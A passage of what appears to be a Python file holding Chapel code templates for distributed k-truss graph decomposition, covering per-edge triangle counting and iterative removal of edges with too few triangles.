var dv1=nei[v1]+neiR[v1];
var dv2=nei[v2]+neiR[v2];
var sv1:int;
var lv2:int;
var sdv1:int;
var ldv2:int;
if (dv1<=dv2) {
sv1=v1;
lv2=v2;
sdv1=dv1;
ldv2=dv2;
} else {
sv1=v2;
lv2=v1;
sdv1=dv2;
ldv2=dv1;
}
{
var nextStart=start_i[sv1];
var nextEnd=start_i[sv1]+nei[sv1]-1;
if (nei[sv1]>0) {
forall j in nextStart..nextEnd with (+ reduce Count){
//forall j in nextStart..nextEnd with (ref SetNextF){
//for j in nextStart..nextEnd {
var v3=src[j];//v3==sv1
var v4=dst[j];
var tmpe:int;
if ( (EdgeDeleted[j]<=-1) && ( lv2!=v4 ) ) {
var dv4=nei[v4]+neiR[v4];
if (ldv2<dv4) {
tmpe=findEdge(lv2,v4);
} else {
tmpe=findEdge(v4,lv2);
}
if (tmpe!=-1) {// there is such third edge
if ( EdgeDeleted[tmpe]==-1 ) {
if ((EdgeDeleted[j]==-1) && (EdgeDeleted[tmpe]==-1)) {
//TriCount[i]+=1;
Count+=1;
}
}
}
}// end of if EdgeDeleted[j]<=-1
}// end of forall j in nextStart..nextEnd
}// end of if nei[v1]>1
nextStart=start_iR[sv1];
nextEnd=start_iR[sv1]+neiR[sv1]-1;
if (neiR[sv1]>0) {
forall j in nextStart..nextEnd with (+ reduce Count ){
//forall j in nextStart..nextEnd with (ref SetNextF){
//forall j in nextStart..nextEnd {
var v3=srcR[j];//sv1==v3
var v4=dstR[j];
var e1=exactEdge(v4,v3);// we need the edge ID in src instead of srcR
var tmpe:int;
if (e1!=-1) {
if ( (EdgeDeleted[e1]<=-1) && ( lv2!=v4 ) ) {
// we first check if the two different vertices can be the third edge
var dv4=nei[v4]+neiR[v4];
if ldv2<dv4 {
tmpe=findEdge(lv2,v4);
} else {
tmpe=findEdge(v4,lv2);
}
if (tmpe!=-1) {// there is such third edge
if ( EdgeDeleted[tmpe]<=-1 ) {
if ( (EdgeDeleted[e1]==-1) && (EdgeDeleted[tmpe]==-1) ) {
//TriCount[i]+=1;
Count+=1;
}
}
}
}
}
}// end of forall j in nextStart..nextEnd
}// end of if
}// end of triangle counting
}// i is an undeleted edge
TriCount[i]=Count;
}// end of forall. We get the number of triangles for each edge
}// end of on loc
} // end of coforall loc in Locales
'''
'''
// first we calculate the number of triangles using mininum search method.
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
var Count:int;
Count=0;
if (EdgeDeleted[i]==-1) {
var v1=src[i];
var v2=dst[i];
var dv1=nei[v1]+neiR[v1];
var dv2=nei[v2]+neiR[v2];
var sv1:int;
var lv2:int;
var sdv1:int;
var ldv2:int;
if (dv1<=dv2) {
sv1=v1;
lv2=v2;
sdv1=dv1;
ldv2=dv2;
} else {
sv1=v2;
lv2=v1;
sdv1=dv2;
ldv2=dv1;
}
{
var nextStart=start_i[sv1];
var nextEnd=start_i[sv1]+nei[sv1]-1;
if (nei[sv1]>0) {
forall j in nextStart..nextEnd with (+ reduce Count){
//forall j in nextStart..nextEnd with (ref SetNextF){
//for j in nextStart..nextEnd {
var v3=src[j];//v3==sv1
var v4=dst[j];
var tmpe:int;
if ( (EdgeDeleted[j]<=-1) && ( lv2!=v4 ) ) {
var dv4=nei[v4]+neiR[v4];
if (ldv2<dv4) {
tmpe=findEdge(lv2,v4);
} else {
tmpe=findEdge(v4,lv2);
}
if (tmpe!=-1) {// there is such third edge
if ( EdgeDeleted[tmpe]==-1 ) {
if ((EdgeDeleted[j]==-1) && (EdgeDeleted[tmpe]==-1)) {
//TriCount[i]+=1;
Count+=1;
}
}
}
}// end of if EdgeDeleted[j]<=-1
}// end of forall j in nextStart..nextEnd
}// end of if nei[v1]>1
nextStart=start_iR[sv1];
nextEnd=start_iR[sv1]+neiR[sv1]-1;
if (neiR[sv1]>0) {
forall j in nextStart..nextEnd with (+ reduce Count ){
//forall j in nextStart..nextEnd with (ref SetNextF){
//forall j in nextStart..nextEnd {
var v3=srcR[j];//sv1==v3
var v4=dstR[j];
var e1=exactEdge(v4,v3);// we need the edge ID in src instead of srcR
var tmpe:int;
if (e1!=-1) {
if ( (EdgeDeleted[e1]<=-1) && ( lv2!=v4 ) ) {
// we first check if the two different vertices can be the third edge
var dv4=nei[v4]+neiR[v4];
if ldv2<dv4 {
tmpe=findEdge(lv2,v4);
} else {
tmpe=findEdge(v4,lv2);
}
if (tmpe!=-1) {// there is such third edge
if ( EdgeDeleted[tmpe]<=-1 ) {
if ( (EdgeDeleted[e1]==-1) && (EdgeDeleted[tmpe]==-1) ) {
//TriCount[i]+=1;
Count+=1;
}
}
}
}
}
}// end of forall j in nextStart..nextEnd
}// end of if
}// end of triangle counting
}// i is an undeleted edge
TriCount[i].write(Count);
}// end of forall. We get the number of triangles for each edge
}// end of on loc
} // end of coforall loc in Locales
'''
NaiveMinSearch=TimerAndWhileStart+MinSearchTriCount+MarkDelEdges
TimerAndNoWhileStart='''
timer.start();
//while (ConFlag) {
{
'''
MinSearchTriCountAtomic='''
// first we calculate the number of triangles using mininum search method.
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
var Count:int;
Count=0;
if (EdgeDeleted[i]==-1) {
var v1=src[i];
var v2=dst[i];
var dv1=nei[v1]+neiR[v1];
var dv2=nei[v2]+neiR[v2];
var sv1:int;
var lv2:int;
var sdv1:int;
var ldv2:int;
if (dv1<=dv2) {
sv1=v1;
lv2=v2;
sdv1=dv1;
ldv2=dv2;
} else {
sv1=v2;
lv2=v1;
sdv1=dv2;
ldv2=dv1;
}
{
var nextStart=start_i[sv1];
var nextEnd=start_i[sv1]+nei[sv1]-1;
if (nei[sv1]>0) {
forall j in nextStart..nextEnd with (+ reduce Count){
//forall j in nextStart..nextEnd with (ref SetNextF){
//for j in nextStart..nextEnd {
var v3=src[j];//v3==sv1
var v4=dst[j];
var tmpe:int;
if ( (EdgeDeleted[j]<=-1) && ( lv2!=v4 ) ) {
var dv4=nei[v4]+neiR[v4];
if (ldv2<dv4) {
tmpe=findEdge(lv2,v4);
} else {
tmpe=findEdge(v4,lv2);
}
if (tmpe!=-1) {// there is such third edge
if ( EdgeDeleted[tmpe]==-1 ) {
if ((EdgeDeleted[j]==-1) && (EdgeDeleted[tmpe]==-1)) {
Count+=1;
}
}
}
}// end of if EdgeDeleted[j]<=-1
}// end of forall j in nextStart..nextEnd
}// end of if nei[v1]>1
nextStart=start_iR[sv1];
nextEnd=start_iR[sv1]+neiR[sv1]-1;
if (neiR[sv1]>0) {
forall j in nextStart..nextEnd with (+ reduce Count ){
//forall j in nextStart..nextEnd with (ref SetNextF){
//forall j in nextStart..nextEnd {
var v3=srcR[j];//sv1==v3
var v4=dstR[j];
var e1=exactEdge(v4,v3);// we need the edge ID in src instead of srcR
var tmpe:int;
if (e1!=-1) {
if ( (EdgeDeleted[e1]<=-1) && ( lv2!=v4 ) ) {
// we first check if the two different vertices can be the third edge
var dv4=nei[v4]+neiR[v4];
if ldv2<dv4 {
tmpe=findEdge(lv2,v4);
} else {
tmpe=findEdge(v4,lv2);
}
if (tmpe!=-1) {// there is such third edge
if ( EdgeDeleted[tmpe]<=-1 ) {
if ( (EdgeDeleted[e1]==-1) && (EdgeDeleted[tmpe]==-1) ) {
//TriCount[i]+=1;
Count+=1;
}
}
}
}
}
}// end of forall j in nextStart..nextEnd
}// end of if
}// end of triangle counting
}// i is an undeleted edge
TriCount[i].write(Count);
}// end of forall. We get the number of triangles for each edge
}// end of on loc
} // end of coforall loc in Locales
'''
WhileAndAffectEdgeRemoveStart='''
}
//writeln("after Triangle coutning");
ConFlag=true;
while (ConFlag) {
// here we mark the edges whose number of triangles is less than k-2 as 1-k
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
if ((EdgeDeleted[i]==-1) && (TriCount[i].read() < k-2)) {
EdgeDeleted[i] = 1-k;
SetCurF.add(i);
}
}
}// end of on loc
} // end of coforall loc in Locales
ConFlag=false;
// we try to remove as many edges as possible in the following code
var tmpN2=0:int;
'''
MinSearchAffectedEdgeRemoval='''
while (SetCurF.getSize()>0) {
//first we build the edge set that will be affected by the removed edges in SetCurF
coforall loc in Locales with ( ref SetNextF) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in SetCurF with (ref SetNextF) {
if (xlocal(i,startEdge,endEdge)) {//each local only check the owned edges
var v1=src[i];
var v2=dst[i];
var dv1=nei[v1]+neiR[v1];
var dv2=nei[v2]+neiR[v2];
var sv1:int;
var lv2:int;
var sdv1:int;
var ldv2:int;
if (dv1<=dv2) {
sv1=v1;
lv2=v2;
sdv1=dv1;
ldv2=dv2;
} else {
sv1=v2;
lv2=v1;
sdv1=dv2;
ldv2=dv1;
}
{
var nextStart=start_i[sv1];
var nextEnd=start_i[sv1]+nei[sv1]-1;
if (nei[sv1]>0) {
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=src[j];//v3==sv1
var v4=dst[j];
var tmpe:int;
if ( (EdgeDeleted[j]<=-1) && ( lv2!=v4 ) ) {
var dv4=nei[v4]+neiR[v4];
if (ldv2<=dv4) {
tmpe=findEdge(lv2,v4);
} else {
tmpe=findEdge(v4,lv2);
}
if (tmpe!=-1) {// there is such third edge
if ( EdgeDeleted[tmpe]<=-1 ) {
if ((EdgeDeleted[j]==-1) && (EdgeDeleted[tmpe]==-1)) {
TriCount[tmpe].sub(1);
TriCount[j].sub(1);
} else {
if ((EdgeDeleted[j]==-1) && (i<tmpe)) {
TriCount[j].sub(1);
} else {
if ((EdgeDeleted[tmpe]==-1) &&(i<j)) {
TriCount[tmpe].sub(1);
}
}
}
}
}
}// end of if EdgeDeleted[j]<=-1
}// end of forall j in nextStart..nextEnd
}// end of if nei[v1]>1
nextStart=start_iR[sv1];
nextEnd=start_iR[sv1]+neiR[sv1]-1;
if (neiR[sv1]>0) {
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=srcR[j];//sv1==v3
var v4=dstR[j];
var e1=exactEdge(v4,v3);// we need the edge ID in src instead of srcR
var tmpe:int;
if (e1!=-1) {
if ( (EdgeDeleted[e1]<=-1) && ( lv2!=v4 ) ) {
// we first check if the two different vertices can be the third edge
var dv4=nei[v4]+neiR[v4];
if ldv2<dv4 {
tmpe=findEdge(lv2,v4);
} else {
tmpe=findEdge(v4,lv2);
}
if (tmpe!=-1) {// there is such third edge
if ( EdgeDeleted[tmpe]<=-1 ) {
if ( (EdgeDeleted[e1]==-1) && (EdgeDeleted[tmpe]==-1) ) {
TriCount[tmpe].sub(1);
TriCount[e1].sub(1);
} else {
if ((EdgeDeleted[e1]==-1) && (i<tmpe)) {
TriCount[e1].sub(1);
} else {
if ((EdgeDeleted[tmpe]==-1) &&(i<e1)) {
TriCount[tmpe].sub(1);
}
}
}
}
}
}
}
}// end of forall j in nextStart..nextEnd
}// end of if
}// end of affected edge search
} // end if (xlocal(i,startEdge,endEdge)
} // end forall i in SetCurF with (ref SetNextF)
} //end on loc
} //end coforall loc in Locales
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in SetCurF {
if (xlocal(i,startEdge,endEdge)) {//each local only check the owned edges
EdgeDeleted[i]=k-1;
}
}
}
}
RemovedEdge.add(SetCurF.getSize());
//writeln("In ", tmpN2, " iteraton,", SetCurF.getSize(), " edges have been removed");
SetCurF.clear();
// then we try to remove the affected edges
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
if ((EdgeDeleted[i]==-1) && (TriCount[i].read() < k-2)) {
EdgeDeleted[i] = 1-k;
SetCurF.add(i);
}
}
}// end of on loc
} // end of coforall loc in Locales
tmpN2+=1;
SetNextF.clear();
}// end of while
'''
TrussAtomic=TimerAndNoWhileStart+MinSearchTriCountAtomic+WhileAndAffectEdgeRemoveStart+MinSearchAffectedEdgeRemoval
MixMinSearchTriCountAtomic='''
// first we calculate the number of triangles
coforall loc in Locales with ( ref SetNextF) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in startEdge..endEdge {
TriCount[i].write(0);
}
//forall i in startEdge..endEdge with(ref SetCurF){
forall i in startEdge..endEdge {
var u = src[i];
var v = dst[i];
var du=nei[u];
var dv=nei[v];
{
var beginTmp=start_i[u];
var endTmp=beginTmp+nei[u]-1;
if ((EdgeDeleted[i]==-1) && (u!=v) ){
if ( (nei[u]>1) ){
//forall x in dst[beginTmp..endTmp] with (ref uadj) {
forall x in dst[beginTmp..endTmp] {
var e=exactEdge(u,x);//here we find the edge ID to check if it has been removed
if (e!=-1){
if ((EdgeDeleted[e] ==-1) && (x !=v) && (i<e)) {
var e3=findEdge(x,v);
// wedge case i<e, u->v, u->x
if (e3!=-1) {
if (EdgeDeleted[e3]==-1) {
TriCount[i].add(1);
TriCount[e].add(1);
TriCount[e3].add(1);
}
}
}
}
}
}
}
beginTmp=start_i[v];
endTmp=beginTmp+nei[v]-1;
if ((EdgeDeleted[i]==-1) && (u!=v) ){
if ( (nei[v]>0) ){
//forall x in dst[beginTmp..endTmp] with (ref vadj) {
forall j in beginTmp..endTmp {
var x=dst[j];
if ((EdgeDeleted[j] ==-1) && (x !=u) && (i<j)) {
var e3=exactEdge(x,u);
if (e3!=-1) {
if ((EdgeDeleted[e3]==-1) && (i<e3)) {
// cycle case i<j,i<e3, u->v->x->u
TriCount[i].add(1);
TriCount[j].add(1);
TriCount[e3].add(1);
}
}
}
}
}
}
}// end of if du<=dv
}// end of forall. We get the number of triangles for each edge
}// end of on loc
} // end of coforall loc in Locales
'''
'''
ConFlag=true;
while (ConFlag) {
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
if ((EdgeDeleted[i]==-1) && (TriCount[i].read() < k-2)) {
EdgeDeleted[i] = 1-k;
SetCurF.add(i);
}
}
}// end of on loc
} // end of coforall loc in Locales
ConFlag=false;
// we try to remove as many edges as possible in the following code
var tmpN2=0:int;
'''
MixMinSearchAffectedEdgeRemoval='''
while (SetCurF.getSize()>0) {
//first we build the edge set that will be affected by the removed edges in SetCurF
coforall loc in Locales with ( ref SetNextF) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in SetCurF with (ref SetNextF) {
if (xlocal(i,startEdge,endEdge)) {//each local only check the owned edges
var v1=src[i];
var v2=dst[i];
var dv1=nei[v1];
var dv2=nei[v2];
{
var nextStart=start_i[v1];
var nextEnd=start_i[v1]+nei[v1]-1;
if (nei[v1]>1) {
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=src[j];//v3==v1
var v4=dst[j];
var tmpe:int;
if ( (EdgeDeleted[j]<=-1) && ( v2!=v4 ) ) {
//v1->v2, v1->v4
tmpe=findEdge(v2,v4);
if (tmpe!=-1) {// there is such third edge
if ( EdgeDeleted[tmpe]<=-1 ) {
if ((EdgeDeleted[j]==-1) && (EdgeDeleted[tmpe]==-1)) {
TriCount[tmpe].sub(1);
TriCount[j].sub(1);
} else {
//if ((EdgeDeleted[j]==-1) && (i<tmpe)) {
if ((EdgeDeleted[j]==-1) ) {
TriCount[j].sub(1);
} else {
if ((EdgeDeleted[tmpe]==-1) &&(i<j)) {
TriCount[tmpe].sub(1);
}
}
}
}
}
}// end of if EdgeDeleted[j]<=-1
}// end of forall j in nextStart..nextEnd
}// end of if nei[v1]>1
nextStart=start_i[v2];
nextEnd=start_i[v2]+nei[v2]-1;
if (nei[v2]>0) {
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=src[j];//v3==v2
var v4=dst[j];
var tmpe:int;
if ( (EdgeDeleted[j]<=-1) && ( v1!=v4 ) ) {
tmpe=exactEdge(v4,v1);
// cycle case v1->v2->v4->v1
if (tmpe!=-1) {// there is such third edge
if ( EdgeDeleted[tmpe]<=-1 ) {
if ((EdgeDeleted[j]==-1) && (EdgeDeleted[tmpe]==-1)) {
TriCount[tmpe].sub(1);
TriCount[j].sub(1);
} else {
if ((EdgeDeleted[j]==-1) && (i<tmpe) ) {
TriCount[j].sub(1);
} else {
if ((EdgeDeleted[tmpe]==-1) && (i<j) ) {
TriCount[tmpe].sub(1);
}
}
}
}
}
}
}// end of forall j in nextStart..nextEnd
}// end of if
//check the case of x->v1 and x->v2
nextStart=start_iR[v1];
nextEnd=start_iR[v1]+neiR[v1]-1;
var dv1=neiR[v1];
var dv2=neiR[v2];
if ((dv1<=dv2) && (dv1>0)) {
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=srcR[j];//v3==v1
var v4=dstR[j];
var e2=exactEdge(v4,v3);
if (EdgeDeleted[e2]<=-1) {
var tmpe=exactEdge(v4,v2);
if (tmpe!=-1) {
if ((EdgeDeleted[e2]==-1) && (EdgeDeleted[tmpe]==-1)) {
TriCount[tmpe].sub(1);
TriCount[e2].sub(1);
}
}
}
}
} else {
nextStart=start_iR[v2];
nextEnd=start_iR[v2]+neiR[v2]-1;
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=srcR[j];//v3==v2
var v4=dstR[j];
var e2=exactEdge(v4,v3);
if (EdgeDeleted[e2]<=-1) {
var tmpe=exactEdge(v4,v1);
if (tmpe!=-1) {
if ((EdgeDeleted[e2]==-1) && (EdgeDeleted[tmpe]==-1)) {
TriCount[tmpe].sub(1);
TriCount[e2].sub(1);
}
}
}
}
}
}
} // end if (xlocal(i,startEdge,endEdge)
} // end forall i in SetCurF with (ref SetNextF)
} //end on loc
} //end coforall loc in Locales
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in SetCurF {
if (xlocal(i,startEdge,endEdge) ) {//each local only check the owned edges
EdgeDeleted[i]=k-1;
}
}
}
}
RemovedEdge.add(SetCurF.getSize());
//writeln("In ", tmpN2, " iteraton,", SetCurF.getSize(), " edges have been removed");
SetCurF.clear();
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
if ((EdgeDeleted[i]==-1) && (TriCount[i].read() < k-2)) {
EdgeDeleted[i] = 1-k;
SetCurF.add(i);
}
}
}// end of on loc
} // end of coforall loc in Locales
SetNextF.clear();
tmpN2+=1;
}// end of while
'''
TrussMixAtomic=TimerAndNoWhileStart+MixMinSearchTriCountAtomic+WhileAndAffectEdgeRemoveStart+MixMinSearchAffectedEdgeRemoval
#TrussAtomic=TimerAndNoWhileStart+MinSearchTriCount+WhileAndAffectEdgeRemoveStart+MinSearchAffectedEdgeRemoval
MaxTrussStart='''
timer.start();
ConFlag=true;
//while (ConFlag) {
{
// here we mark the edges whose number of triangles is less than k-2 as 1-k
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
if ((EdgeDeleted[i]==-1) && (TriCount[i].read() < k-2)) {
EdgeDeleted[i] = 1-k;
SetCurF.add(i);
}
}
}// end of on loc
} // end of coforall loc in Locales
ConFlag=false;
// we try to remove as many edges as possible in the following code
var tmpN2=0:int;
'''
'''
while (SetCurF.getSize()>0) {
//first we build the edge set that will be affected by the removed edges in SetCurF
coforall loc in Locales with ( ref SetNextF) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in SetCurF with (ref SetNextF) {
if (xlocal(i,startEdge,endEdge)) {//each local only check the owned edges
var v1=src[i];
var v2=dst[i];
var dv1=nei[v1]+neiR[v1];
var dv2=nei[v2]+neiR[v2];
var sv1:int;
var lv2:int;
var sdv1:int;
var ldv2:int;
if (dv1<=dv2) {
sv1=v1;
lv2=v2;
sdv1=dv1;
ldv2=dv2;
} else {
sv1=v2;
lv2=v1;
sdv1=dv2;
ldv2=dv1;
}
{
var nextStart=start_i[sv1];
var nextEnd=start_i[sv1]+nei[sv1]-1;
if (nei[sv1]>0) {
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=src[j];//v3==sv1
var v4=dst[j];
var tmpe:int;
if ( (EdgeDeleted[j]<=-1) && ( lv2!=v4 ) ) {
var dv4=nei[v4]+neiR[v4];
if (ldv2<=dv4) {
tmpe=findEdge(lv2,v4);
} else {
tmpe=findEdge(v4,lv2);
}
if (tmpe!=-1) {// there is such third edge
if ( EdgeDeleted[tmpe]<=-1 ) {
if ((EdgeDeleted[j]==-1) && (EdgeDeleted[tmpe]==-1)) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
if ((EdgeDeleted[j]==-1) && (i<tmpe)) {
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
if ((EdgeDeleted[tmpe]==-1) &&(i<j)) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
}
}
}
}
}
}// end of if EdgeDeleted[j]<=-1
}// end of forall j in nextStart..nextEnd
}// end of if nei[v1]>1
nextStart=start_iR[sv1];
nextEnd=start_iR[sv1]+neiR[sv1]-1;
if (neiR[sv1]>0) {
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=srcR[j];//sv1==v3
var v4=dstR[j];
var e1=exactEdge(v4,v3);// we need the edge ID in src instead of srcR
var tmpe:int;
if (e1!=-1) {
if ( (EdgeDeleted[e1]<=-1) && ( lv2!=v4 ) ) {
// we first check if the two different vertices can be the third edge
var dv4=nei[v4]+neiR[v4];
if ldv2<dv4 {
tmpe=findEdge(lv2,v4);
} else {
tmpe=findEdge(v4,lv2);
}
if (tmpe!=-1) {// there is such third edge
if ( EdgeDeleted[tmpe]<=-1 ) {
if ( (EdgeDeleted[e1]==-1) && (EdgeDeleted[tmpe]==-1) ) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
TriCount[e1].sub(1);
if TriCount[e1].read() <k-2 {
SetNextF.add((i,e1));
}
} else {
if ((EdgeDeleted[e1]==-1) && (i<tmpe)) {
TriCount[e1].sub(1);
if TriCount[e1].read() <k-2 {
SetNextF.add((i,e1));
}
} else {
if ((EdgeDeleted[tmpe]==-1) &&(i<e1)) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
}
}
}
}
}
}
}
}// end of forall j in nextStart..nextEnd
}// end of if
}// end of affected edge search
} // end if (xlocal(i,startEdge,endEdge)
} // end forall i in SetCurF with (ref SetNextF)
} //end on loc
} //end coforall loc in Locales
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in SetCurF {
if (xlocal(i,startEdge,endEdge) && (EdgeDeleted[i]==1-k)) {//each local only check the owned edges
EdgeDeleted[i]=k-1;
}
}
}
}
RemovedEdge.add(SetCurF.getSize());
SetCurF.clear();
// then we try to remove the affected edges
coforall loc in Locales {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall (i,j) in SetNextF {
if (xlocal(j,startEdge,endEdge)) {//each locale only check its owned edges
if (EdgeDeleted[j]==-1) {
EdgeDeleted[j]=1-k;
SetCurF.add(j);
}
}
}
} //end on loc
} //end coforall loc in Locales
tmpN2+=1;
SetNextF.clear();
}// end of while
'''
MaxTrussAtomic=MaxTrussStart+MinSearchAffectedEdgeRemoval
'''
timer.start();
ConFlag=true;
//while (ConFlag) {
{
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
if ((EdgeDeleted[i]==-1) && (TriCount[i].read() < k-2)) {
EdgeDeleted[i] = 1-k;
SetCurF.add(i);
}
}
}// end of on loc
} // end of coforall loc in Locales
ConFlag=false;
// we try to remove as many edges as possible in the following code
var tmpN2=0:int;
'''
'''
while (SetCurF.getSize()>0) {
//first we build the edge set that will be affected by the removed edges in SetCurF
coforall loc in Locales with ( ref SetNextF) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in SetCurF with (ref SetNextF) {
if (xlocal(i,startEdge,endEdge)) {//each local only check the owned edges
var v1=src[i];
var v2=dst[i];
var dv1=nei[v1];
var dv2=nei[v2];
{
var nextStart=start_i[v1];
var nextEnd=start_i[v1]+nei[v1]-1;
if (nei[v1]>1) {
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=src[j];//v3==v1
var v4=dst[j];
var tmpe:int;
if ( (EdgeDeleted[j]<=-1) && ( v2!=v4 ) ) {
//v1->v2, v1->v4
tmpe=findEdge(v2,v4);
if (tmpe!=-1) {// there is such third edge
if ( EdgeDeleted[tmpe]<=-1 ) {
if ((EdgeDeleted[j]==-1) && (EdgeDeleted[tmpe]==-1)) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
//if ((EdgeDeleted[j]==-1) && (i<tmpe)) {
if ((EdgeDeleted[j]==-1) ) {
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
if ((EdgeDeleted[tmpe]==-1) &&(i<j)) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read()<k-2 {
SetNextF.add((i,tmpe));
//EdgeDeleted[tmpe]=1-k;
}
}
}
}
}
}
}// end of if EdgeDeleted[j]<=-1
}// end of forall j in nextStart..nextEnd
}// end of if nei[v1]>1
nextStart=start_i[v2];
nextEnd=start_i[v2]+nei[v2]-1;
if (nei[v2]>0) {
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=src[j];//v3==v2
var v4=dst[j];
var tmpe:int;
if ( (EdgeDeleted[j]<=-1) && ( v1!=v4 ) ) {
tmpe=exactEdge(v4,v1);
// cycle case v1->v2->v4->v1
if (tmpe!=-1) {// there is such third edge
if ( EdgeDeleted[tmpe]<=-1 ) {
if ((EdgeDeleted[j]==-1) && (EdgeDeleted[tmpe]==-1)) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
if ((EdgeDeleted[j]==-1) && (i<tmpe) ) {
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
if ((EdgeDeleted[tmpe]==-1) && (i<j) ) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
}
}
}
}
}
}
}// end of forall j in nextStart..nextEnd
}// end of if
//check the case of x->v1 and x->v2
nextStart=start_iR[v1];
nextEnd=start_iR[v1]+neiR[v1]-1;
var dv1=neiR[v1];
var dv2=neiR[v2];
if ((dv1<=dv2) && (dv1>0)) {
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=srcR[j];//v3==v1
var v4=dstR[j];
var e2=exactEdge(v4,v3);
if (EdgeDeleted[e2]==-1) {
var tmpe=exactEdge(v4,v2);
if (tmpe!=-1) {
if (EdgeDeleted[tmpe]==-1) {
TriCount[e2].sub(1);
if TriCount[e2].read() <k-2 {
SetNextF.add((i,e2));
}
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
}
}
}
}
} else {
if (dv2>0) {
nextStart=start_iR[v2];
nextEnd=start_iR[v2]+neiR[v2]-1;
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=srcR[j];//v3==v2
var v4=dstR[j];
var e2=exactEdge(v4,v3);
if (EdgeDeleted[e2]==-1) {
var tmpe=exactEdge(v4,v1);
if (tmpe!=-1) {
if (EdgeDeleted[tmpe]==-1) {
TriCount[e2].sub(1);
if TriCount[e2].read() <k-2 {
SetNextF.add((i,e2));
}
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
}
}
}
}
}
}
}
} // end if (xlocal(i,startEdge,endEdge)
} // end forall i in SetCurF with (ref SetNextF)
} //end on loc
} //end coforall loc in Locales
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in SetCurF {
if (xlocal(i,startEdge,endEdge) && (EdgeDeleted[i]==1-k)) {//each local only check the owned edges
EdgeDeleted[i]=k-1;
}
}
}
}
RemovedEdge.add(SetCurF.getSize());
//writeln("In ", tmpN2, " iteraton,", SetCurF.getSize(), " edges have been removed");
SetCurF.clear();
coforall loc in Locales with (ref SetNextF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall (i,j) in SetNextF {
